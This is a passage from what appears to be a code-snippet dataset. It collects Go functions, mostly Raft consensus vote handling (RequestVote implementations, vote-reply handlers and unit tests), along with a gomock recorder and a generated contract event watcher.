false\n\n\tif args.Term < rf.currentTerm {\n\t\treply.Term = rf.currentTerm\n\t\treply.VoteGranted = false\n\t\treturn\n\t}\n\n\tif args.Term == rf.currentTerm {\n\t\tif rf.voteFor == -1 || rf.voteFor == args.CandidateId {\n\t\t\tlastLogTerm, lastLogIdx := rf.getLastLogTermAndIdx()\n\t\t\tif lastLogTerm < args.LastLogTerm || lastLogTerm == args.LastLogTerm && lastLogIdx <= args.LastLogIdx {\n\t\t\t\treply.VoteGranted = true\n\t\t\t\trf.voteFor = args.CandidateId\n\t\t\t\treturn\n\t\t\t} else {\n\t\t\t\treply.VoteGranted = false\n\t\t\t\treturn\n\t\t\t}\n\t\t} else {\n\t\t\treply.VoteGranted = false\n\t\t\treturn\n\t\t}\n\t}\n\n\tif args.Term > rf.currentTerm {\n\t\t//收到更大的term,先更新状态;再判断日志的新旧来投票\n\t\trf.changeToFollower(args.Term)\n\t\t//fixbug: 忘记在收到更大的term时更新votefor\n\t\trf.voteFor = -1\n\n\t\treply.Term = args.Term\n\n\t\tlastLogTerm, lastLogIdx := rf.getLastLogTermAndIdx()\n\t\tif lastLogTerm < args.LastLogTerm || lastLogTerm == args.LastLogTerm && lastLogIdx <= args.LastLogIdx {\n\t\t\treply.VoteGranted = true\n\t\t\trf.voteFor = args.CandidateId\n\t\t\treturn\n\t\t} else {\n\t\t\treply.VoteGranted = false\n\t\t\treturn\n\t\t}\n\t}\n\n}", "func TestLearnerLogReplication(t *testing.T) {\n\tn1 := newTestLearnerRaft(1, []uint64{1}, []uint64{2}, 10, 1, NewMemoryStorage())\n\tn2 := newTestLearnerRaft(2, []uint64{1}, []uint64{2}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(n1)\n\tdefer closeAndFreeRaft(n2)\n\n\tnt := newNetwork(n1, n2)\n\n\tn1.becomeFollower(1, None)\n\tn2.becomeFollower(1, None)\n\n\tsetRandomizedElectionTimeout(n1, n1.electionTimeout)\n\tfor i := 0; i < n1.electionTimeout; i++ {\n\t\tn1.tick()\n\t}\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgBeat})\n\n\t// n1 is leader and n2 is learner\n\tif n1.state != StateLeader {\n\t\tt.Errorf(\"peer 1 state: %s, want %s\", n1.state, StateLeader)\n\t}\n\tif !n2.isLearner {\n\t\tt.Error(\"peer 2 state: not learner, want yes\")\n\t}\n\n\tnextCommitted := n1.raftLog.committed + 1\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"somedata\")}}})\n\tif n1.raftLog.committed != nextCommitted {\n\t\tt.Errorf(\"peer 1 wants committed to %d, but still %d\", nextCommitted, n1.raftLog.committed)\n\t}\n\n\tif n1.raftLog.committed != n2.raftLog.committed {\n\t\tt.Errorf(\"peer 2 wants committed to %d, but still %d\", n1.raftLog.committed, n2.raftLog.committed)\n\t}\n\n\tmatch := n1.getProgress(2).Match\n\tif match != n2.raftLog.committed {\n\t\tt.Errorf(\"progress 2 of leader 1 wants match %d, but got %d\", n2.raftLog.committed, match)\n\t}\n}", "func TestChangeConfig_removeVoters(t *testing.T) {\n\t// launch 5 node cluster\n\tc, ldr, flrs := launchCluster(t, 5)\n\tdefer c.shutdown()\n\n\t// wait for commit ready\n\tc.waitCommitReady(ldr)\n\n\telectionAborted0 := c.registerFor(eventElectionAborted, flrs[0])\n\tdefer c.unregister(electionAborted0)\n\telectionAborted1 := c.registerFor(eventElectionAborted, flrs[1])\n\tdefer c.unregister(electionAborted1)\n\n\t// submit ChangeConfig with two voters removed\n\tconfig := c.info(ldr).Configs.Latest\n\tif err := config.SetAction(flrs[0].nid, Remove); err != nil {\n\t\tt.Fatal(err)\n\t}\n\tif err := config.SetAction(flrs[1].nid, Remove); err != nil {\n\t\tt.Fatal(err)\n\t}\n\tc.ensure(waitTask(ldr, ChangeConfig(config), c.longTimeout))\n\n\t// wait for stable config\n\tc.ensure(waitTask(ldr, WaitForStableConfig(), c.longTimeout))\n\n\t// ensure that removed nodes aborted election\n\te, err := electionAborted0.waitForEvent(c.longTimeout)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tif e.reason != \"not voter\" {\n\t\tc.Fatalf(\"reason=%q, want %q\", e.reason, \"not part of cluster\")\n\t}\n\t_, err = electionAborted1.waitForEvent(c.longTimeout)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tif e.reason != \"not voter\" {\n\t\tc.Fatalf(\"reason=%q, want %q\", e.reason, \"not part of cluster\")\n\t}\n\n\t// shutdown the removed nodes\n\tc.shutdown(flrs[0], flrs[1])\n\n\t// shutdown the leader\n\tc.shutdown(ldr)\n\n\t// wait for leader among the remaining two nodes\n\tc.waitForLeader(flrs[2], flrs[3])\n}", "func (rf *Raft) RequestVote(args RequestVoteArgs, reply *RequestVoteReply) {\n\t//fmt.Printf(\"[::RequestVote]\\n\")\n\t// Your code here.\n\trf.mtx.Lock()\n\tdefer rf.mtx.Unlock()\n\tdefer rf.persist()\n\n\treply.VoteGranted = false\n\n\t// case 1: check term\n\tif args.Term < rf.currentTerm {\n\t\treply.Term = rf.currentTerm\n\t\treturn\n\t}\n\n\tif args.Term > rf.currentTerm { // set term to max. and then maybe become leader.\n\t\trf.currentTerm = args.Term\n\t\trf.state = STATE_FOLLOWER\n\t\trf.voteFor = -1\n\t}\n\treply.Term = rf.currentTerm\n\n\t// case 2: check log\n\tisNewer := false\n\tif args.LastLogTerm == rf.log[len(rf.log)-1].Term {\n\t\tisNewer = args.LastLogIndex >= rf.log[len(rf.log)-1].LogIndex\n\t} else {\n\t\tisNewer = args.LastLogTerm > rf.log[len(rf.log)-1].Term\n\t}\n\n\tif (rf.voteFor == -1 || rf.voteFor == args.CandidateId) && isNewer {\n\t\trf.chanVoteOther <- 1\n\t\trf.state = STATE_FOLLOWER\n\t\treply.VoteGranted = true\n\t\trf.voteFor = args.CandidateId\n\t}\n\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tdefer rf.persist()\n\n\treply.VoteGranted = false\n\treply.Term = rf.currentTerm\n\n\t// Rule for all servers: If RPC request or response contains term T > currentTerm: set currentTerm = T, convert to follower (§5.1)\n\tif args.Term > rf.currentTerm {\n\t\trf.convertToFollower(args.Term)\n\t}\n\n\t// 1. Reply false if term < currentTerm (§5.1)\n\tif args.Term < rf.currentTerm {\n\t\t_, _ = DPrintf(vote(\"[T%v] %v: Received RequestVote from %v | Discarded Vote | Received Lower Term \"), rf.currentTerm, rf.me, args.CandidateID, args.CandidateID)\n\t\treturn\n\t}\n\n\t/* 2. If\n\t *\t\t1. votedFor is null or candidateId\n\t *\t\t2. candidate’s log is at least as up-to-date as receiver’s log\n\t *\tgrant vote (§5.2, §5.4)\n\t */\n\n\t// Check 1 vote: should be able to vote or voted for candidate\n\tvoteCheck := rf.votedFor == noVote || rf.votedFor == args.CandidateID\n\t// Check 2 up-to-date = (same indices OR candidate's lastLogIndex > current peer's lastLogIndex)\n\tlastLogIndex, lastLogTerm := rf.lastLogEntryIndex(), rf.lastLogEntryTerm()\n\tlogCheck := lastLogTerm < args.LastLogTerm || (lastLogTerm == args.LastLogTerm && lastLogIndex <= args.LastLogIndex)\n\n\t// Both checks should be true to grant vote\n\tif voteCheck && logCheck {\n\t\treply.VoteGranted = true\n\t\t_, _ = DPrintf(vote(\"[T%v] %v: Received RequestVote from %v | Vote Successful\"), rf.currentTerm, rf.me, args.CandidateID)\n\t\trf.currentTerm = args.Term\n\t\trf.votedFor = args.CandidateID\n\t} else if !voteCheck {\n\t\t_, _ = DPrintf(vote(\"[T%v] %v: Received RequestVote from %v | Vote Failure | Already voted for %v\"), rf.currentTerm, rf.me, args.CandidateID, rf.votedFor)\n\t} else {\n\t\t_, _ = DPrintf(vote(\"[T%v] %v: Received RequestVote from %v | Vote Failure | No Up-To-Date Log | Received {LastLogTerm: %v, LastLogIndex: %v} | Current {LastLogTerm: %v, LastLogIndex: %v}\"),\n\t\t\trf.currentTerm, rf.me, args.CandidateID, args.LastLogTerm, args.LastLogIndex, lastLogTerm, lastLogIndex)\n\t}\n\trf.resetTTL()\n}", "func (r *RaftNode) shouldVoteFor(req *RequestVoteRequest) bool {\n\t// Candidate must have equal or higher term for a chance\n\tif req.GetTerm() < r.GetCurrentTerm() {\n\t\tr.Out(\"Rejected to vote for %v because of lower term\", req.Candidate.Id)\n\t\treturn false\n\t}\n\n\t// Candidate's log is not less up to date\n\tif r.logMoreUpdatedThan(req.GetLastLogIndex(), req.GetLastLogTerm()) {\n\t\treturn false\n\t}\n\n\t// The node has already voted for another candidate in this term\n\tif req.GetTerm() == r.GetCurrentTerm() && r.GetVotedFor() != \"\" && r.GetVotedFor() != req.GetCandidate().GetId() {\n\t\tr.Out(\"Rejected %v because already voted in term\", req.Candidate.Id)\n\t\treturn false\n\t}\n\n\treturn true\n}", "func (r *raftState) addVoter(addr string) error {\n\n\tconfigFuture := r.raft.GetConfiguration()\n\tif err := configFuture.Error(); err != nil {\n\t\tr.logger.Info(\"failed to get raft configuration\", \"error\", err)\n\t\treturn err\n\t}\n\n\tfor _, srv := range configFuture.Configuration().Servers {\n\t\tif srv.Address == raft.ServerAddress(addr) {\n\t\t\treturn nil\n\n\t\t}\n\t}\n\n\tf := r.raft.AddVoter(raft.ServerID(addr), raft.ServerAddress(addr), 0, 0)\n\tif f.Error() != nil {\n\t\treturn f.Error()\n\t}\n\n\treturn nil\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tdefer rf.persist()\n\n\tif args.Term < rf.currentTerm {\n\t\t\treply.Term = rf.currentTerm\n\t\t\treply.VoteGranted = false\n\t\t\treturn\n\t\t}\n\tif args.Term > rf.currentTerm{\n\t\trf.currentTerm = args.Term\n\t\trf.votedFor = -1\n\t\trf.role = 0\n\t\trf.roleChan <- 0\n\t\t}\n\treply.Term = args.Term\n\tfmt.Printf(\"LastLogTerm:%v rf.log:%v sever:%v \\n\", args.LastLogTerm, rf.log[len(rf.log)-1].Term, rf.me)\n\tif rf.votedFor != -1 && rf.votedFor != args.CandidateId {\n\t reply.VoteGranted = false \n\t }else if rf.log[len(rf.log)-1].Term > args.LastLogTerm{\n\t \treply.VoteGranted = false\n\t }else if rf.log[len(rf.log)-1].Index > args.LastLogIndex && rf.log[len(rf.log)-1].Term == args.LastLogTerm{\n\t \treply.VoteGranted = false\n\t }else{\n\t fmt.Printf(\"Server %v vote for server %v \\n\", rf.me, args.CandidateId)\n\t reply.VoteGranted = true\n\t rf.votedFor = args.CandidateId\n\t rf.GrantVote <- true\n\t }\n\n\t}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.mu.Lock()\n\tif args.Term < rf.currentTerm {\n\t\treply.Term = rf.currentTerm\n\t\treply.VoteGranted = false\n\t\trf.mu.Unlock()\n\t\treturn\n\t}\n\t// follow the second rule in \"Rules for Servers\" in figure 2 before handling an incoming RPC\n\tif args.Term > rf.currentTerm {\n\t\trf.currentTerm = args.Term\n\t\trf.state = FOLLOWER\n\t\trf.votedFor = -1\n\t\trf.persist()\n\t}\n\n\treply.Term = rf.currentTerm\n\treply.VoteGranted = true\n\t// deny vote if already voted\n\tif rf.votedFor != -1 {\n\t\treply.VoteGranted = false\n\t\trf.mu.Unlock()\n\t\treturn\n\t}\n\t// deny vote if consistency check fails (candidate is less up-to-date)\n\tlastLog := rf.log[len(rf.log)-1]\n\tif args.LastLogTerm < lastLog.Term || (args.LastLogTerm == lastLog.Term && args.LastLogIndex < len(rf.log)-1) {\n\t\treply.VoteGranted = false\n\t\trf.mu.Unlock()\n\t\treturn\n\t}\n\t// now this peer must vote for the candidate\n\trf.votedFor = args.CandidateID\n\trf.mu.Unlock()\n\n\trf.resetTimer()\n}", "func (rf *Raft) AtLeastAsUpToDate(candidate RequestVoteArgs) bool {\n\tlastLogEntry := rf.lastLogEntry() // NOTE: this could be \"zero\" struct\n\tswitch {\n\tcase candidate.LastLogTerm > lastLogEntry.Term:\n\t\treturn true\n\tcase candidate.LastLogTerm == lastLogEntry.Term:\n\t\treturn candidate.LastLogIndex >= rf.lastApplied // is lastApplied correct here?\n\tcase candidate.LastLogTerm < lastLogEntry.Term:\n\t\treturn false\n\tdefault: // TODO need this?\n\t\treturn false\n\t}\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\n\n\t//fmt.Printf(\"成功调用RequestVote!\\n\")\n\t// Your code here (2A, 2B).\n\t//rf.mu.Lock()\n\t//current_time:=time.Now().UnixNano()/1e6\n\t//&&current_time-rf.voted_time>800\n\trf.mu.Lock()\n\n\tif (rf.term>args.Candidate_term)&&((args.Last_log_term>rf.Last_log_term)||(args.Last_log_term==rf.Last_log_term&&args.Last_log_term_lenth>=rf.last_term_log_lenth)){\n\t\trf.term=args.Candidate_term\n\t\trf.state=0\n\t}\n\n\n\t/*\n\t\tif args.Append==true&&((args.Newest_log.Log_Term<rf.Last_log_term)||(args.Newest_log.Log_Term==rf.Last_log_term&&args.Last_log_term_lenth<rf.Last_log_term)){\n\t\t\treply.Term=args.Candidate_term+1\n\t\t\treply.Last_log_term=rf.Last_log_term\n\t\t\treply.Last_log_lenth=rf.last_term_log_lenth\n\t\t\treply.Append_success=false\n\t\t\trf.mu.Unlock()\n\t\t\treturn\n\t\t}\n\t*/\n\t//if args.Second==true{\n\t//\tfmt.Printf(\"!\\n!\\n!\\n!\\n!\\n编号为%d的raft实例收到编号为%d的leader的second请求!本机term是%d,leader term是%d,args.Append是%v\\n\",rf.me,args.From,rf.term,args.Candidate_term,args.Append)\n\t//}\n\n\tif rf.state==2&&((rf.term<args.Candidate_term)||(rf.term==args.Candidate_term&&args.Last_log_term<rf.Last_log_term))&&args.Votemsg==false{\n\t\t//fmt.Printf(\"分区恢复后编号为%d的raft实例的term是%d,发现自己已经不是leader!leader是%d,leader的term是%d\\n\",rf.me,rf.term,args.From,args.Candidate_term)\n\t\trf.state=0\n\t\trf.leaderID=args.From\n\t}\n\n\n\n\tif args.Candidate_term>=rf.term{\n\t\t//rf.term=args.Candidate_term\n\t\t//if args.Second==true{\n\t\t//\tfmt.Printf(\"服务器上的SECOND进入第一个大括号\\n\")\n\t\t//}\n\t\tif args.Append == false {\n\t\t\tif args.Votemsg == true && rf.voted[args.Candidate_term] == 0&&((args.Last_log_term>rf.Last_log_term)||(args.Last_log_term==rf.Last_log_term&&args.Last_log_term_lenth>=rf.last_term_log_lenth)) { //合法投票请求\n\t\t\t\t//fmt.Printf(\"编号为%d的raft实例对投票请求的回答为true,term统一更新为为%d\\n\",rf.me,rf.term)\n\n\t\t\t\t//rf.term = args.Candidate_term\n\t\t\t\trf.voted[args.Candidate_term] = 1\n\t\t\t\treply.Vote_sent = true\n\n\t\t\t\t//rf.voted_time=time.Now().UnixNano()/1e6\n\n\t\t\t}else if args.Votemsg==true{ //合法的纯heartbeat\n\t\t\t\tif rf.voted[args.Candidate_term]==1 {\n\t\t\t\t\treply.Voted = true\n\t\t\t\t}\n\t\t\t\t//fmt.Printf(\"请求方的term是%d,本机的term是%d,来自%d的投票请求被%d拒绝!rf.last_log_term是%d,rf.last_log_lenth是%d,本机的rf.last_log_term是%d,rf.last_log_lenth是%d\\n\",args.Candidate_term,rf.term,args.From,rf.me,args.Last_log_term,args.Last_log_term_lenth,rf.Last_log_term,rf.last_term_log_lenth)\n\t\t\t}\n\t\t\treply.Term=rf.term\n\n\t\t\t//rf.term=args.Candidate_term//!!!!!!!!!!!!!!!!!!!!!!!!!!!\n\t\t\t//if args.Votemsg==true{//!!!!!!!!!!!!!!\n\t\t\t//\trf.term=args.Candidate_term//!!!!!!!!!!!!\n\t\t\t//}//!!!!!!!!!!!!!!!!!\n\n\t\t} else { //这条是关于日志的\n\t\t\t//这个请求是日志同步请求,接收方需要将自己的日志最后一条和leader发过来的声称的进行比较,如果leader的更新且leader的PREV和自己的LAST相同就接受\n\t\t\t//还得找到最后一个一致的日志位置,然后将后面的全部更新为和leader一致的,这意味着中间多次的RPC通信\n\n\t\t\t/*\n\t\t\tif args.Newest_log.Log_Term<rf.Last_log_term{\n\t\t\t\treply.Wrong_leader=true\n\t\t\t\treply.Term=rf.term\n\t\t\t\treply.Append_success=false\n\t\t\t\treply.Last_log_lenth=rf.last_term_log_lenth\n\t\t\t\treturn\n\t\t\t}\n*/\n\n\t\t\tif (rf.Last_log_term>args.Last_log_term)||(rf.Last_log_term==args.Last_log_term&&rf.last_term_log_lenth>args.Last_log_term_lenth){\n\t\t\t\treply.Append_success=false\n\t\t\t\treply.Last_log_term=rf.Last_log_term\n\t\t\t\treply.Last_log_lenth=rf.last_term_log_lenth\n\t\t\t\trf.mu.Unlock()\n\t\t\t\treturn\n\t\t\t}\n\n\n\t\t\trf.term=args.Candidate_term\n\t\t\tif args.Second==true{\n\t\t\t\t//\tfmt.Printf(\"在服务器端进入second阶段!\\n\")\n\t\t\t\trf.log=rf.log[:args.Second_position]\n\t\t\t\trf.log=append(rf.log,args.Second_log...)\n\t\t\t\treply.Append_success=true\n\t\t\t\trf.Last_log_term=args.Last_log_term\n\t\t\t\trf.last_term_log_lenth=args.Last_log_term_lenth\n\t\t\t\trf.Last_log_index=len(rf.log)-1\n\t\t\t\trf.Log_Term=args.Log_Term\n\t\t\t\t//fmt.Printf(\"Second APPend在服务器端成功!现在编号为%d的raft实例的log是%v, last_log_term是%d,term是%d\\n\",rf.me,rf.log,rf.Last_log_term,rf.term)\n\t\t\t}else{\n\t\t\t\tif args.Append_Try == false {//try用于表示是否是第一次append失败了现在正在沟通\n\t\t\t\t\trf.append_try_log_index = rf.Last_log_index\n\t\t\t\t\trf.append_try_log_term=rf.Last_log_term\n\t\t\t\t}\n\t\t\t\tif args.Prev_log_index != rf.append_try_log_index || args.Prev_log_term != rf.append_try_log_term{\n\t\t\t\t\t//fmt.Printf(\"匹配失败!!!%d号leader发过来的PREV_log_index是%d,本机%d的last_log_index是%d,PREV_term是%d,本机的last_log_term是%d!\\n\",args.From,args.Prev_log_index,rf.me,rf.append_try_log_index,args.Prev_log_term,rf.append_try_log_term)\n\t\t\t\t\treply.Vote_sent = false//匹配失败后进入双方沟通try\n\t\t\t\t\treply.Append_success = false\n\n\t\t\t\t\treply.Log_Term=rf.Log_Term\n\n\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\treturn\n\t\t\t\t} else { //说明没问题。可以更新\n\t\t\t\t\t//fmt.Printf(\"匹配成功!!!%d号是leader,发过来的PREV_log_index是%d,本机的last_log_index是%d,PREV_term是%d,本机的last_log_term是%d,准备更新本机日志!!\\n\", args.From, args.Prev_log_index, rf.append_try_log_index, args.Prev_log_term, rf.append_try_log_term)\n\t\t\t\t\t//rf.Last_log_term = args.Last_log_term\n\t\t\t\t\trf.last_term_log_lenth=args.Last_log_term_lenth\n\t\t\t\t\trf.log = append(rf.log, args.Newest_log)\n\t\t\t\t\trf.Last_log_index += 1\n\t\t\t\t\trf.Log_Term = args.Log_Term\n\t\t\t\t\trf.Last_log_term=args.Newest_log.Log_Term\n\t\t\t\t\treply.Append_success = true\n\t\t\t\t\t//fmt.Printf(\"APPend成功,现在编号为%d的raft实例的log是%v,last_log_term是%d,term是%d\\n\",rf.me,rf.log,rf.Last_log_term,rf.term)\n\t\t\t\t}\n\t\t\t}\n\t\t\trf.log_added_content = args.Newest_log\n\t\t\trf.last_term_log_lenth=0\n\n\t\t\tfor cc:=len(rf.log)-1;cc>-1;cc--{\n\t\t\t\tif rf.log[cc].Log_Term!=rf.Last_log_term{\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t\trf.last_term_log_lenth+=1\n\t\t\t}\n\n\n\t\t}\n\n\t\t//fmt.Printf(\"在更新heartbeat之前\\n\")\n\t\tif args.Votemsg==false {//加上个约束条件更严谨,加上了表示是在heartbeat开始之后认同了这个是leader,否则在投票阶段就认同了\n\t\t\t//fmt.Printf(\"rf.last_log_term %d, args.last_log_term %d\\n\",rf.Last_log_term,args.Last_log_term)\n\t\t\tif args.Last_log_term==rf.Last_log_term {//!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n\t\t\t\tif args.Commit_MSG == true {\n\t\t\t\t\t//if len(rf.Log_Term)==len(args.Log_Term)&&rf.Log_Term[len(rf.Log_Term)-1]==args.Log_Term[len(args.Log_Term)-1]{\n\t\t\t\t\t//if len(args.Log_Term)==len(rf.Log_Term)&&args.Last_log_term==rf.Last_log_term {\n\t\t\t\t\tfor cc := rf.committed_index + 1; cc <= rf.Last_log_index; cc++ {\n\t\t\t\t\t\trf.committed_index = cc\n\t\t\t\t\t\t//!-------------------------fmt.Printf(\"在follower %d 上进行commit,commit_index是%d,commit的内容是%v,commit的term是%d,last_log_term是%d, rf.log是太长暂时鸽了\\n\", rf.me, cc, rf.log[cc].Log_Command, rf.log[cc].Log_Term, rf.Last_log_term)\n\t\t\t\t\t\trf.applych <- ApplyMsg{true, rf.log[rf.committed_index].Log_Command, rf.committed_index}\n\t\t\t\t\t}\n\n\t\t\t\t\treply.Commit_finished = true\n\t\t\t\t\t//}else{\n\t\t\t\t\t//}\n\t\t\t\t\t//}\n\t\t\t\t}\n\t\t\t}//!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n\n\t\t\trf.leaderID = args.From\n\t\t\trf.term = args.Candidate_term\n\t\t\trf.leaderID=args.From\n\n\n\t\t}\n\t\treply.Last_log_lenth=rf.last_term_log_lenth\n\t\treply.Last_log_term=rf.Last_log_term\n\n\t\tif args.Votemsg==false {\n\t\t\tif rf.state == 0 {\n\t\t\t\trf.last_heartbeat <- 1\n\t\t\t}\n\t\t}\n\n\t}else{\n\t\t//fmt.Printf(\"term都不符,明显是非法的!\\n\")\n\t\treply.Vote_sent = false\n\t\treply.Append_success = false\n\t\treply.Term=rf.term\n\t\treply.Last_log_lenth=rf.last_term_log_lenth\n\t\treply.Last_log_term=rf.Last_log_term\n\t\t//-------------------if (args.Last_log_term>rf.Last_log_term)||(args.Last_log_term==rf.Last_log_term&&args.Last_log_term_lenth>=rf.last_term_log_lenth){\n\t\t//----------------------\treply.You_are_true=true\n\t\t//------------------------}\n\t}\n\trf.mu.Unlock()\n\t//fmt.Printf(\"编号为%d的raft实例通过RequestVote()收到了heartbeat\\n\",rf.me)\n\t//reply.voted<-true\n\t//rf.mu.Unlock()\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tcurrentTerm := rf.currentTerm\n\n\t//If RPC request or response contains term T > currentTerm:\n\t//set currentTerm = T, convert to follower\n\tif (args.Term > currentTerm) {\n\t\trf.currentTerm = args.Term\n\t\trf.votedFor = NILVOTE\n\n\t\tif rf.role == LEADER {\n\t\t\tDPrintf(\"LeaderCondition sorry server %d term %d not a leader, logs %v, commitIndex %d\\n\",rf.me, rf.currentTerm, rf.log, rf.commitIndex) \n\t\t} \n\t\trf.role = FOLLOWER\n\t\trf.persist()\n\t}\n\n\tif args.Term < currentTerm {\n\t\t// Reply false if term < currentTerm \n\t\treply.VoteGranted = false\n\t\treply.Term = currentTerm \n\t}else {\n\t\t//If votedFor is null or candidateId,\n\t\t//and candidate’s log is at least as up-to-date as receiver’s log,\n\t\t//&& rf.atLeastUptodate(args.LastLogIndex, args.LastLogTerm)\n\t\tif (rf.votedFor == NILVOTE || rf.votedFor == args.CandidateId) && rf.atLeastUptodate(args.LastLogIndex, args.LastLogTerm) {\n\t\t\ti , t := rf.lastLogIdxAndTerm()\n\t\t\tPrefixDPrintf(rf, \"voted to candidate %d, args %v, lastlogIndex %d, lastlogTerm %d\\n\", args.CandidateId, args, i, t)\n\t\t\trf.votedFor = args.CandidateId\n\t\t\trf.persist()\t\n\t\t\treply.VoteGranted = true\n\t\t\treply.Term = rf.currentTerm\n\t\t\t//you grant a vote to another peer.\n\t\t\trf.resetTimeoutEvent = makeTimestamp()\n\t\t}else {\n\t\t\treply.VoteGranted = false\n\t\t\treply.Term = rf.currentTerm\n\t\t}\t\n\t}\n}", "func (rf *Raft) handleVoteReply(reply* RequestVoteReply) {\n\tDebugPrint(\"%d(%d): receive vote reply from %d(%d), state: %d\\n\",\n\t\trf.me, rf.term, reply.To, reply.Term, rf.state)\n\tstart := time.Now()\n\tdefer calcRuntime(start, \"handleVoteReply\")\n\tif !rf.checkVote(reply.To, reply.Term, reply.MsgType, &reply.VoteGranted) {\n\t\treturn\n\t}\n\tif (rf.state == Candidate && reply.MsgType == MsgRequestVoteReply) ||\n\t\t(rf.state == PreCandidate && reply.MsgType == MsgRequestPrevoteReply) {\n\t\tDebugPrint(\"%d(%d): access vote reply from %d(%d), accept: %t, state: %d\\n\",\n\t\t\trf.me, rf.term, reply.To, reply.Term, reply.VoteGranted, rf.state)\n\t\tif reply.VoteGranted {\n\t\t\trf.votes[reply.To] = 1\n\t\t} else {\n\t\t\trf.votes[reply.To] = 0\n\t\t}\n\t\tquorum := len(rf.peers) / 2 + 1\n\t\taccept := 0\n\t\treject := 0\n\t\tfor _, v := range rf.votes {\n\t\t\tif v == 1 {\n\t\t\t\taccept += 1\n\t\t\t} else if v == 0 {\n\t\t\t\treject += 1\n\t\t\t}\n\t\t}\n\t\tif accept >= quorum {\n\t\t\tfor idx, v := range rf.votes {\n\t\t\t\tif v == 1 {\n\t\t\t\t\tDebugPrint(\"%d vote for me(%d).\\n\", idx, rf.me)\n\t\t\t\t}\n\t\t\t}\n\t\t\tDebugPrint(\"%d win.\\n\", rf.me)\n\t\t\tif rf.state == PreCandidate {\n\t\t\t\tfmt.Printf(\"The server %d, wins Pre-vote Election\\n\", rf.me)\n\t\t\t\trf.campaign(MsgRequestVote)\n\t\t\t} else {\n\t\t\t\tDebugPrint(\"%d win vote\\n\", rf.me)\n\t\t\t\trf.becomeLeader()\n\t\t\t\tfmt.Printf(\"The server %d, wins Election\\n\", rf.me)\n\t\t\t\t// rf.propose(nil, rf.raftLog.GetDataIndex())\n\t\t\t\trf.proposeNew(nil, rf.raftLog.GetDataIndex(), rf.me)\n\t\t\t}\n\t\t} else if reject == quorum {\n\t\t\tDebugPrint(\"%d has been reject by %d members\\n\", rf.me, reject)\n\t\t\trf.becomeFollower(rf.term, -1)\n\t\t}\n\t}\n\tDebugPrint(\"%d(%d): receive vote end\\n\", rf.me, rf.term)\n}", "func TestFollowerVote(t *testing.T) {\n\ttests := []struct {\n\t\tvote uint64\n\t\tnvote uint64\n\t\twreject bool\n\t}{\n\t\t{None, 1, false},\n\t\t{None, 2, false},\n\t\t{1, 1, false},\n\t\t{2, 2, false},\n\t\t{1, 2, true},\n\t\t{2, 1, true},\n\t}\n\tfor i, tt := range tests {\n\t\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\t\tdefer closeAndFreeRaft(r)\n\t\tr.loadState(pb.HardState{Term: 1, Vote: tt.vote})\n\n\t\tr.Step(pb.Message{From: tt.nvote, FromGroup: pb.Group{NodeId: tt.nvote, GroupId: 1, RaftReplicaId: tt.nvote},\n\t\t\tTo: 1, ToGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTerm: 1, Type: pb.MsgVote})\n\n\t\tmsgs := r.readMessages()\n\t\twmsgs := []pb.Message{\n\t\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\t\tTo: tt.nvote, ToGroup: pb.Group{NodeId: tt.nvote, GroupId: 1, RaftReplicaId: tt.nvote},\n\t\t\t\tTerm: 1, Type: pb.MsgVoteResp, Reject: tt.wreject},\n\t\t}\n\t\tif !reflect.DeepEqual(msgs, wmsgs) {\n\t\t\tt.Errorf(\"#%d: msgs = %v, want %v\", i, msgs, wmsgs)\n\t\t}\n\t}\n}", "func (mr *MockPostsRepoInterfaceMockRecorder) Vote(arg0, arg1 interface{}) *gomock.Call {\n\tmr.mock.ctrl.T.Helper()\n\treturn mr.mock.ctrl.RecordCallWithMethodType(mr.mock, \"Vote\", reflect.TypeOf((*MockPostsRepoInterface)(nil).Vote), arg0, arg1)\n}", "func (_Contracts *ContractsFilterer) WatchVoted(opts *bind.WatchOpts, sink chan<- *ContractsVoted, _proposal []*big.Int, _position []*big.Int, _candidate []*big.Int) (event.Subscription, error) {\n\n\tvar _proposalRule []interface{}\n\tfor _, _proposalItem := range _proposal {\n\t\t_proposalRule = append(_proposalRule, _proposalItem)\n\t}\n\tvar _positionRule []interface{}\n\tfor _, _positionItem := range _position {\n\t\t_positionRule = append(_positionRule, _positionItem)\n\t}\n\tvar _candidateRule []interface{}\n\tfor _, _candidateItem := range _candidate {\n\t\t_candidateRule = append(_candidateRule, _candidateItem)\n\t}\n\n\tlogs, sub, err := _Contracts.contract.WatchLogs(opts, \"Voted\", _proposalRule, _positionRule, _candidateRule)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn event.NewSubscription(func(quit <-chan struct{}) error {\n\t\tdefer sub.Unsubscribe()\n\t\tfor {\n\t\t\tselect {\n\t\t\tcase log := <-logs:\n\t\t\t\t// New log arrived, parse the event and forward to the user\n\t\t\t\tevent := new(ContractsVoted)\n\t\t\t\tif err := _Contracts.contract.UnpackLog(event, \"Voted\", log); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tevent.Raw = log\n\n\t\t\t\tselect {\n\t\t\t\tcase sink <- 